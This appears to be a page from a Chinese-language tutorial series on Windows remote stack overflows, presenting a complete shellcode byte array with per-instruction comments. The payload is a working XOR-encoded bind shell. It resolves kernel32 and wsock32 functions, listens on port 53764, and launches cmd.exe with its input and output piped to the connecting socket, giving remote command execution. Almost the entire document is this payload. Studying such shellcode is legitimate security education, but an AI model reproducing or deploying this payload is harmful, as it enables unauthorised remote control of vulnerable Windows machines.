window系统下的远程堆栈溢出----shellcode编写

堆栈溢出系列讲座
window系统下的远程堆栈溢出----shellcode编写

应用前面的设计思想,我们可以写出如下的shellcode:

/*
 * Hard-coded bind-shell payload used by this tutorial. It is laid out as four
 * consecutive parts (each described by the per-instruction comments below):
 *   1. a decoder stub: repnz scasd locates the 0xffffffff marker near the end
 *      of the array and the loop XORs the 0xC6 bytes before it with key 0x99;
 *   2. import resolution: LoadLibrary and GetProcAddress are reached through
 *      fixed addresses (the mov ebx / mov bl immediates, presumably slots in
 *      the target image's import table - not stated on this page), and the
 *      resolved entry points are stored as a 16-entry table at
 *      [edi-0x40 .. edi-0x04], which all later `call [edi-xx]` use;
 *   3. socket/bind/listen on the port encoded below, two anonymous pipes,
 *      CreateProcessA("cmd.exe") with its standard handles redirected to
 *      those pipes, accept, then a relay loop between the pipes and the socket;
 *   4. the XOR(0x99)-encoded string table: DLL names, API names, a
 *      sockaddr_in, "cmd.exe", the end marker and a trailing CR LF.
 * The initializer supplies fewer than 580 bytes; C zero-fills the remainder.
 * For analysis, every string, the listen port and the command line are
 * recoverable by XOR-ing the table with 0x99, as noted inline.
 */
unsigned char sploit[580] = {
0x90, 0x8b, 0xfc, /* nop ; mov edi,esp */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax */
0xf7, 0xd0, /* not eax ; eax = 0xffffffff, the end marker searched for below */
0x50, /* push eax */
0x59, /* pop ecx ; ecx = 0xffffffff (scan limit) */
0xf2, /* repnz */
0xaf, /* scasd ; scan forward from esp for the marker; edi ends just past it */
0x59, /* pop ecx */
0xb1, 0xc6, /* mov cl, C6 ; 0xC6 = 198 bytes to decode, walking backwards from edi */
0x8b, 0xc7, /* mov eax, edi */
/* Xorshellcode: */
0x48, /* dec eax */
0x80, 0x30, 0x99, /* xor byte ptr [eax], 99 ; decode one byte with key 0x99 */
0xe2, 0xfa, /* loop Xorshellcode */
0x33, 0xf6, /* xor esi, esi */
0x96, /* xchg eax,esi ; esi -> start of the decoded string table ("KERNEL32") */
0xbb,0x99, 0xe8, 0x61, 0x42, /* mov ebx, &LoadLibrary ; low byte 0x99 is dropped by the shr below (presumably a NUL-avoiding pad) */
0xc1, 0xeb, 0x08, /* shr ebx, 08 */
0x56, /* push esi ; lpLibFileName = "KERNEL32" */
0xff, 0x13, /* call dword ptr [ebx] ; LoadLibrary */
0x8b, 0xd0, /* mov edx, eax ; edx = hModule */
0xfc, /* cld */
0x33, 0xc9, /* xor ecx, ecx */
0xb1, 0x0b, /* mov cl, 0B */
0x49, /* dec ecx ; 10 kernel32 names to resolve */
/* loadKernelProcess: (shared by the NUL-skip `jne` and the outer `loop`) */
0x32, 0xc0, /* xor al, al */
0xac, /* lodsb */
0x84, 0xc0, /* test al, al */
0x75, 0xf9, /* jne loadKernelProcess ; advance esi past the NUL ending the previous string */
0x52, /* push edx ; save hModule */
0x51, /* push ecx ; save loop counter */
0x56, /* push esi ; lpProcName */
0x52, /* push edx ; hModule */
0xb3, 0xe4, /* mov bl, e4 ; ebx = &GetProcAddress */
0xff, 0x13, /* call dword ptr [ebx] ; GetProcAddress */
0xab, /* stosd ; append the entry point to the function table at edi */
0x59, /* pop ecx */
0x5a, /* pop edx */
0xe2, 0xec, /* loop loadKernelProcess */
/* skip the NUL after the last kernel32 name, then load the socket DLL */
0x32, 0xc0, /* xor al, al */
0xac, /* lodsb */
0x84, 0xc0, /* test al, al */
0x75, 0xf9, /* jne -7 (back to the xor al,al above) */
0xb3, 0xe8, /* mov bl, e8 ; ebx = &LoadLibrary again */
0x56, /* push esi ; lpLibFileName = "WSOCK32" */
0xff, 0x13, /* call dword ptr [ebx] ; LoadLibrary */
0x8b, 0xd0, /* mov edx, eax ; edx = hModule */
0xfc, /* cld */
0x33, 0xc9, /* xor ecx, ecx */
0xb1, 0x06, /* mov cl, 06 ; 6 wsock32 names to resolve */
/* loadSocketProcess: (same shape as loadKernelProcess) */
0x32, 0xc0, /* xor al, al */
0xac, /* lodsb */
0x84, 0xc0, /* test al, al */
0x75, 0xf9, /* jne loadSocketProcess */
0x52, /* push edx */
0x51, /* push ecx */
0x56, /* push esi ; lpProcName */
0x52, /* push edx ; hModule */
0xb3, 0xe4, /* mov bl, e4 ; ebx = &GetProcAddress */
0xff, 0x13, /* call dword ptr [ebx] */
0xab, /* stosd */
0x59, /* pop ecx */
0x5a, /* pop edx */
0xe2, 0xec, /* loop loadSocketProcess */
/*
 * Everything above is the preparation phase: it resolves the entry address of
 * every API the payload uses and stores them, in table order, at edi. The
 * names are the decoded string table at the end of the array - 10 kernel32
 * entries and 6 wsock32 entries, matching the loop counts loaded above
 * (the original comment listed "KERNEL32.dll" / "WSOCK32.dll" and omitted
 * CloseHandle; the table decodes as follows):
 * "KERNEL32"
 *   "CreatePipe"     -> [edi-40]
 *   "GetStartupInfoA"-> [edi-3C]
 *   "CreateProcessA" -> [edi-38]
 *   "CloseHandle"    -> [edi-34]
 *   "PeekNamedPipe"  -> [edi-30]
 *   "GlobalAlloc"    -> [edi-2C]
 *   "WriteFile"      -> [edi-28]
 *   "ReadFile"       -> [edi-24]
 *   "Sleep"          -> [edi-20]
 *   "ExitProcess"    -> [edi-1C]
 * "WSOCK32"
 *   "socket"         -> [edi-18]
 *   "bind"           -> [edi-14]
 *   "listen"         -> [edi-10]
 *   "accept"         -> [edi-0C]
 *   "send"           -> [edi-08]
 *   "recv"           -> [edi-04]
 */
0x83, 0xc6, 0x05, /* add esi, 00000005 ; skip "recv" and its NUL: esi -> sockstruc (decoded sockaddr_in). Author's note: edi = esp+4+sizeof(exploit)+function table (16*4) */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax ; protocol = 0 */
0x40, /* inc eax */
0x50, /* push eax ; SOCK_STREAM = 1 */
0x40, /* inc eax */
0x50, /* push eax ; AF_INET = 2 */
0xff, 0x57, 0xe8, /* call [edi-18] ; socket(2,1,0) */
0x93, /* xchg eax,ebx ; ebx = listening SOCKET */
0x6a, 0x10, /* push 00000010 ; sizeof(sockstruc) = 16 */
0x56, /* push esi ; &sockstruc */
0x53, /* push ebx ; SOCKET */
0xff, 0x57, 0xec, /* call [edi-14] ; bind */
0x6a, 0x02, /* push 00000002 ; backlog = 2 */
0x53, /* push ebx ; SOCKET */
0xff, 0x57, 0xf0, /* call [edi-10] ; listen */
0x33, 0xc0, /* xor eax, eax */
0x57, /* push edi ; save edi */
0x50, /* push eax ; save 0 */
0xb0, 0x0c, /* mov al, 0C */
0xab, /* stosd ; nLength = 12 */
0x58, /* pop eax */
0xab, /* stosd ; lpSecurityDescriptor = NULL */
0x40, /* inc eax */
0xab, /* stosd ; bInheritHandle = TRUE ; a SECURITY_ATTRIBUTES now sits at the saved edi */
0x5f, /* pop edi */
0x48, /* dec eax */
0x50, /* push eax ; nSize = 0 */
0x57, /* push edi ; lpPipeAttributes = &SECURITY_ATTRIBUTES */
0x56, /* push esi ; hWritePipe out-param; sockstruc is no longer needed after bind, so its storage is reused for handles */
0xad, /* lodsd ; esi += 4 (value loaded into eax is unused) */
0x56, /* push esi ; hReadPipe out-param */
0xff, 0x57, 0xc0, /* call [edi-40] ; CreatePipe (pipe 1: child stdout/stderr) */
0x48, /* dec eax */
0x50, /* push eax ; nSize = 0 (assumes CreatePipe returned 1) */
0x57, /* push edi ; lpPipeAttributes */
0xad, /* lodsd */
0x56, /* push esi ; hWritePipe out-param */
0xad, /* lodsd */
0x56, /* push esi ; hReadPipe out-param */
0xff, 0x57, 0xc0, /* call [edi-40] ; CreatePipe again (pipe 2: child stdin) */
0x48, /* dec eax */
0xb0, 0x44, /* mov al, 44 ; sizeof(STARTUPINFO) */
0x89, 0x07, /* mov dword ptr [edi], eax ; StartupInfo.cb */
0x57, /* push edi */
0xff, 0x57, 0xc4, /* call [edi-3C] ; GetStartupInfoA, filled in at edi */
0x33, 0xc0, /* xor eax, eax */
0x8b, 0x46, 0xf4, /* mov eax, dword ptr [esi-0C] ; pipe-1 write handle */
0x89, 0x47, 0x3c, /* mov dword ptr [edi+3C], eax ; hStdOutput = pipe-1 write */
0x89, 0x47, 0x40, /* mov dword ptr [edi+40], eax ; hStdError = pipe-1 write */
0x8b, 0x06, /* mov eax, dword ptr [esi] ; pipe-2 read handle */
0x89, 0x47, 0x38, /* mov dword ptr [edi+38], eax ; hStdInput = pipe-2 read */
0x33, 0xc0, /* xor eax, eax */
0x66, 0xb8, 0x01, 0x01, /* mov ax, 0101 */
0x89, 0x47, 0x2c, /* mov dword ptr [edi+2C], eax ; dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES */
0x57, /* push edi ; lpProcessInformation (the author reuses the StartupInfo buffer) */
0x57, /* push edi ; lpStartupInfo */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax ; lpCurrentDirectory = NULL */
0x50, /* push eax ; lpEnvironment = NULL */
0x50, /* push eax ; dwCreationFlags = 0 */
0x40, /* inc eax */
0x50, /* push eax ; bInheritHandles = TRUE */
0x48, /* dec eax */
0x50, /* push eax ; lpThreadAttributes = NULL */
0x50, /* push eax ; lpProcessAttributes = NULL */
0xad, /* lodsd ; esi += 4 -> "cmd.exe" */
0x56, /* push esi ; lpCommandLine = "cmd.exe" */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax ; lpApplicationName = NULL */
0xff, 0x57, 0xc8, /* call [edi-38] ; CreateProcessA, eax = 1 ok / 0 error */
0xff, 0x76, 0xf0, /* push [esi-10] ; pipe-1 write handle (child's end) */
0xff, 0x57, 0xcc, /* call [edi-34] ; CloseHandle */
0xff, 0x76, 0xfc, /* push [esi-04] ; pipe-2 read handle (child's end) */
0xff, 0x57, 0xcc, /* call [edi-34] ; CloseHandle */
0x48, /* dec eax ; eax = 0 (assumes CloseHandle returned 1) */
0x50, /* push eax ; addrlen = NULL */
0x50, /* push eax ; addr = NULL */
0x53, /* push ebx ; listening SOCKET */
0xff, 0x57, 0xf4, /* call [edi-0C] ; accept (blocks until a client connects) */
0x8b, 0xd8, /* mov ebx, eax ; ebx = client SOCKET */
0x33, 0xc0, /* xor eax, eax */
0xb4, 0x04, /* mov ah, 04 ; eax = 0x400 */
0x50, /* push eax ; dwBytes = 1024 */
0xc1, 0xe8, 0x04, /* shr eax, 04 ; 0x40 */
0x50, /* push eax ; uFlags = 0x40 = GMEM_FIXED | GMEM_ZEROINIT */
0xff, 0x57, 0xd4, /* call [edi-2C] ; GlobalAlloc(0x40, 1024) */
0x8b, 0xf0, /* mov esi, eax ; esi = relay buffer */
/* PeekPipe: relay loop - child output to socket, socket input to child */
0x33, 0xc0, /* xor eax, eax */
0x8b, 0xc8, /* mov ecx, eax */
0xb5, 0x04, /* mov ch, 04 ; ecx = 1024 */
0x50, /* push eax ; lpBytesLeftThisMessage = NULL */
0x50, /* push eax ; lpTotalBytesAvail = NULL */
0x57, /* push edi ; lpBytesRead -> [edi] */
0x51, /* push ecx ; nBufferSize = 1024 */
0x56, /* push esi ; lpBuffer */
0xff, 0x77, 0xa8, /* push [edi-58] ; pipe-1 read handle (child's stdout) */
0xff, 0x57, 0xd0, /* call [edi-30] ; PeekNamedPipe */
0x83, 0x3f, 0x01, /* cmp dword ptr [edi], 00000001 ; [edi] = bytes available */
0x7c, 0x22, /* jl GetUserInput ; nothing from the child yet */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax ; lpOverlapped = NULL */
0x57, /* push edi ; lpNumberOfBytesRead */
0xff, 0x37, /* push dword ptr [edi] ; nNumberOfBytesToRead */
0x56, /* push esi ; lpBuffer */
0xff, 0x77, 0xa8, /* push [edi-58] ; pipe-1 read handle */
0xff, 0x57, 0xdc, /* call [edi-24] ; ReadFile */
0x0b, 0xc0, /* or eax, eax */
0x74, 0x2f, /* je GameOver ; ReadFile failed (child gone) -> exit */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax ; flags = 0 */
0xff, 0x37, /* push dword ptr [edi] ; len = bytes read */
0x56, /* push esi ; buf */
0x53, /* push ebx ; client SOCKET */
0xff, 0x57, 0xf8, /* call [edi-08] ; send */
0x6a, 0x50, /* push 00000050 ; dwMilliseconds = 80 */
0xff, 0x57, 0xe0, /* call [edi-20] ; Sleep */
0xeb, 0xc8, /* jmp PeekPipe */
/* GetUserInput: */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax ; flags = 0 */
0xb4, 0x04, /* mov ah, 04 ; eax = 1024 */
0x50, /* push eax ; len = 1024 */
0x56, /* push esi ; buf */
0x53, /* push ebx ; client SOCKET */
0xff, 0x57, 0xfc, /* call [edi-04] ; recv (blocks until the client sends) ; eax = byte count */
0x57, /* push edi ; lpOverlapped (author's choice; the value is never a real OVERLAPPED) */
0x33, 0xc9, /* xor ecx, ecx */
0x51, /* push ecx ; lpNumberOfBytesWritten = NULL */
0x50, /* push eax ; nNumberOfBytesToWrite = recv result, used unchecked */
0x56, /* push esi ; lpBuffer */
0xff, 0x77, 0xac, /* push [edi-54] ; pipe-2 write handle (child's stdin) */
0xff, 0x57, 0xd8, /* call [edi-28] ; WriteFile (client input -> child stdin) */
0x6a, 0x50, /* push 00000050 ; dwMilliseconds = 80 */
0xff, 0x57, 0xe0, /* call [edi-20] ; Sleep */
0xeb, 0xaa, /* jmp PeekPipe */
/* GameOver: (target of the `je` after ReadFile, +0x2f from there) */
0x50, /* push eax ; uExitCode = 0 */
0xff, 0x57, 0xe4, /* call [edi-1C] ; ExitProcess */
0x90, /* nop */
/*
 * The code above is the assembly form of the C algorithm presented earlier;
 * the per-instruction comments cover it. What follows is the string table,
 * XOR-encoded with 0x99 (decode each byte as b ^ 0x99): "KERNEL32", the ten
 * kernel32 API names, "WSOCK32", the six wsock32 API names, a sockaddr_in,
 * "cmd.exe", then the 0xffffffff end marker and a trailing CR LF.
 */
0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa, 0xab, 0x99, /* "KERNEL32\0" */
0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, /* "CreatePipe\0" G... */
0xfc, 0xed, 0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff,
0xf6, 0xd8, 0x99, 0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6, /* ...etStartupInfoA\0" "CreatePro... */
0xfa, 0xfc, 0xea, 0xea, 0xd8, 0x99, 0xda, 0xf5, 0xf6, 0xea, 0xfc, 0xd1, /* ...cessA\0" "CloseH... */
0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8, /* ...andle\0" "PeekNa... */
0xf4, 0xfc, 0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb, /* ...medPipe\0" "Glob... */
0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6, 0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed, /* ...alAlloc\0" "Writ... */
0xfc, 0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xcb, 0xfc, 0xf8, 0xfd, 0xdf, 0xf0, /* ...eFile\0" "ReadFi... */
0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99, 0xdc, 0xe1, 0xf0, /* ...le\0" "Sleep\0" "Exi... */
0xed, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0xce, 0xca, 0xd6, /* ...tProcess\0" "WSO... */
0xda, 0xd2, 0xaa, 0xab, 0x99, 0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99, /* ...CK32\0" "socket\0" */
0xfb, 0xf0, 0xf7, 0xfd, 0x99, 0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99, /* "bind\0" "listen\0" */
0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xea, 0xfc, 0xf7, 0xfd, 0x99, /* "accept\0" "send\0" */
0xeb, 0xfc, 0xfa, 0xef, 0x99, 0x9b, 0x99, /* "recv\0" then sockstruc: sin_family = 0x0002 (AF_INET) */
0x4b, 0x9d, // word value for bind port, 4b9d xor 9999h = d204h (network byte order) = 53764
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, /* 12 zero bytes after decoding: sin_addr = 0 (INADDR_ANY) and sin_zero */
0xfa, 0xf4, 0xfd, 0xb7, 0xfc, 0xe1, 0xfc, 0x99, 0xff, 0xff, 0xff, 0xff, /* "cmd.exe\0" then the 0xffffffff end marker the decoder scans for */
0x0d, 0x0a}; /* trailing CR LF, outside the decoded region */
/*
这些就是那个字符串表,已经经过了编码。
*/